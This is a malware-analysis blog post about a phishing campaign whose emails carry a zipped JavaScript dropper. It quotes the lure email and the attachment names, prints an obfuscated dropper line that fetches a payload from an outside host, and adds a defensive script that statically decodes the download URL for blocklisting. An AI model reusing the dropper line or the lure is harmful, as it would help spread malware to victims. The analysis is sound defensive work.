New Javascript malware in emails with subject “Re:”


MX Lab, http://www.mxlab.eu, started to intercept a new malware distribution campaign by email with the subject “Re:”.

This email is sent from spoofed sender addresses and has the following body:

Good evening Harris,

As promised, I have attached the spreadsheet contains last 50 transaction and your account actual balance.

Regards,

Pauline Hughes

The attached file details_xls_A72.zip contains the folder details_xls_A72 with the following files:

transactions 29871684.js
transactions 29871684 - copy.js
transactions 29871684 - copy (2).js

The JavaScript dropper is detected by 10/55 AV engines at VirusTotal.

Analysis of a part of the obfuscated JavaScript, Atlantic1[nYou]("G\x45T", "ht"+"tp"+":/"+"/so"+"co"+"dec"+"o."+"co"+"m/"+"u3"+"ijk"+"s", false);, shows that the script assembles the HTTP method ("G\x45T" is "GET" with a hex-escaped E) and the download URL from small string fragments, and will download a malicious file from the location hxxp://socodeco.com/u3ijks. The detailed Malwr analysis confirms this as well: a malicious file is downloaded from this location as a binary file.

The downloaded binary is detected by 3/55 AV engines at VirusTotal and the analysis is available on Malwr.
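The concatenation trick above defeats simple string-matching on the raw script, but it can be undone statically without running the malware. The following is an added example written for this post, not code from MX Lab or from the sample: it folds quoted literals joined by "+" and decodes \x and \u escapes, so the method name and download URL fall out of the snippet quoted above. The SAMPLE string is a constructed copy of that snippet; the function names are my own.

```javascript
// Added example, not from the MX Lab post: static folding of "a"+"b"+... string
// obfuscation as used in the Atlantic1[nYou](...) call. The script is never
// executed; only quoted literals and the "+" operators between them are parsed.

// Constructed sample reproducing the shape of the snippet quoted in the post.
const SAMPLE = 'Atlantic1[nYou]("G\\x45T", "ht"+"tp"+":/"+"/so"+"co"+"dec"+"o."+"co"+"m/"+"u3"+"ijk"+"s", false);';

// Decode the escape sequences JavaScript allows inside a string literal
// (\xHH, \uHHHH and the common single-character escapes such as \n and \").
function decodeEscapes(raw) {
  return raw.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)/g, (match, esc) => {
    if (esc[0] === 'x' || esc[0] === 'u') {
      return String.fromCharCode(parseInt(esc.slice(1), 16));
    }
    const simple = { n: '\n', r: '\r', t: '\t', '0': '\0' };
    return esc in simple ? simple[esc] : esc; // \" \' \\ and any other char
  });
}

// One string literal: "..." or '...', with backslash escapes allowed inside.
const LITERAL = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/;
// A whole chain of literals joined by "+" (whitespace between them tolerated).
const CHAIN = new RegExp(`(?:${LITERAL.source})(?:\\s*\\+\\s*(?:${LITERAL.source}))*`, 'g');

// Return every string the script would build from concatenated literals,
// in order of appearance, with escapes decoded.
function foldStrings(source) {
  const results = [];
  for (const chain of source.match(CHAIN) || []) {
    let folded = '';
    for (const lit of chain.match(new RegExp(LITERAL.source, 'g'))) {
      const m = LITERAL.exec(lit);
      folded += decodeEscapes(m[1] !== undefined ? m[1] : m[2]);
    }
    results.push(folded);
  }
  return results;
}

// Pick out the folded strings that look like URLs, defanged for safe reporting.
function extractUrls(source) {
  return foldStrings(source)
    .filter((s) => /^https?:\/\//i.test(s))
    .map((s) => s.replace(/^http/i, 'hxxp'));
}

console.log(foldStrings(SAMPLE)); // [ 'GET', 'http://socodeco.com/u3ijks' ]
console.log(extractUrls(SAMPLE)); // [ 'hxxp://socodeco.com/u3ijks' ]
```

Because the folding is purely lexical, it also works on a script fragment pulled from a mail gateway quarantine or a sandbox report, and the defanged URL can go straight into a blocklist or a detection rule.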

Note that the filenames of the ZIP archive, the extracted folder and the decompressed files may vary with each email.

One thought on "New Javascript malware in emails with subject "Re:""

  1. Hi, I received an email from a Roderick Hardy (HardyRoderick2099@40-46 dot nastech dot bg), subject line Re:, with an attachment (that I did not open and would strongly advise no one to open this file):
    credit memos_0C34AE12 then dot zip (6.46KB)
    I am fairly certain that this is a “ransom” type of virus but not sure.
    Could anyone there tell me if this is a “ransom” type of virus or has anyone else seen this yet?
    Also, is this about the right size file for this virus?
    Thank you,
    Herman Wolff
